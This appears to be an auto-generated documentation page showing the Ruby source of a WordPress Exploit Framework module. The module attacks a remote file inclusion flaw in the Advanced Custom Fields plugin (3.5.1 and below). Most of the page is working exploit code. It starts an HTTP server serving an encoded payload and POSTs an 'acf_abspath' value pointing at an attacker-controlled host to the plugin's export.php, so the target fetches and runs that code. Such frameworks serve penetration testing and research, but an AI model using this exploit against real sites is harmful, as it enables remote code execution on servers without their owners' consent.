class Wpxf::Exploit::AdvancedCustomFieldsRemoteFileInclusion
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 7 def initialize super update_info( name: 'Advanced Custom Fields Remote File Inclusion', desc: 'The Advanced Custom Fields plugin, in versions 3.5.1 and below, '\ 'allows for remote file inclusion and remote code execution via '\ 'the export.php script. This exploit only works when the PHP '\ 'option "allow_url_include" is enabled (disabled by default).', author: [ 'Charlie Eriksen <charlie[at]ceriksen.com>', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['URL', 'http://secunia.com/advisories/51037/'], ['WPVDB', '6103'] ], date: 'Nov 14 2012' ) register_options([ StringOption.new( name: 'rfi_host', desc: 'The address of the host listening for a connection', required: true ), StringOption.new( name: 'rfi_path', desc: 'The path to access via the remote file inclusion request', default: Utility::Text.rand_alpha(8), required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 46 def check check_plugin_version_from_readme('advanced-custom-fields', '3.5.2') end
on_http_request(path, params, headers)
click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 62 def on_http_request(path, params, headers) payload.encoded end
plugin_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 42 def plugin_url normalize_uri(wordpress_url_plugins, 'advanced-custom-fields') end
rfi_host()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 50 def rfi_host normalized_option_value('rfi_host') end
rfi_path()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 54 def rfi_path normalized_option_value('rfi_path') end
rfi_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 58 def rfi_url "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}" end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 70 def run return false unless super start_http_server(true) emit_info 'Executing request...' res = execute_post_request( url: vulnerable_url, body: { 'acf_abspath' => rfi_url } ) stop_http_server emit_info "Response code: #{res.code}", true emit_info "Response body: #{res.body}", true if res.code == 500 || res.body =~ /allow_url_include/ emit_error 'allow_url_include appears to be disabled' return false end if res && res.code == 200 && !res.body.strip.empty? emit_success "Result: #{res.body}" end true end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 66 def vulnerable_url normalize_uri(plugin_url, 'core', 'actions', 'export.php') end